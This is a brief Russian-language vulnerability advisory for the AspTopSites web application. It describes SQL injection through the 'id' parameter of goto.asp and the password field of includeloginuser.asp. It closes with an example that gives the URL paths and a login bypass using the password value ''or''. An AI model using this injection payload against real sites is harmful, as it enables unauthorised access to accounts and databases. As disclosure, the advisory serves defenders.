Программа: AspTopSites
Уязвимость существует из-за недостаточной обработки входных данных в параметре "id"
сценария "goto.asp" и в поле пароля в сценарии "includeloginuser.asp". Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Пример:
http://[host]/topsites/default.asp <--- view listings
http://[host]/topsites/goto.asp?id=43 <--- mouseover id value
http://[host]/topsites/includeloginuser.asp <--- login here
user: [ id value ]
password: 'or'
